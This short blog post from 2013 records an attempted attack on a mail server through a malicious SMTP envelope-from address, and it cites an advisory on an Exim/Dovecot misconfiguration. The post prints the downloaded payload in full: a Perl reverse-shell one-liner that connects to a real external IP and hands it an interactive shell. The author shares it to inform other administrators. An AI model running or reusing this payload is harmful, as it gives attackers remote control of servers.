iiegn's blog: SMTP: envelope-from address tries to execute perl

Sunday, May 5, 2013

SMTP: envelope-from address tries to execute perl

earlier today, found this:
(and someone else, too.)
of course, no one wants to execute the downloaded file a.pl:

perl -e 'use Socket;$i="178.218.211.118";$p=9000;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

not sure which MTA is vulnerable, yet.

...in the meantime i found RedTeam Pentesting GmbH has a detailed advisory on the problem: Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution - here

2 comments:

Anonymous said...: Any news on this? I received three of these yesterday on my LAMP webserver, this is the first attempt detected.

I searched on Google but I only found this blog entry.; June 19, 2013 at 10:49 AM
iiegn said...: RedTeam Pentesting GmbH has a detailed evaluation of the problem: Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution - here; June 19, 2013 at 12:09 PM

iiegn's blog

Sunday, May 5, 2013

SMTP: envelope-from address tries to execute perl

2 comments:

Blog Archive

Contributors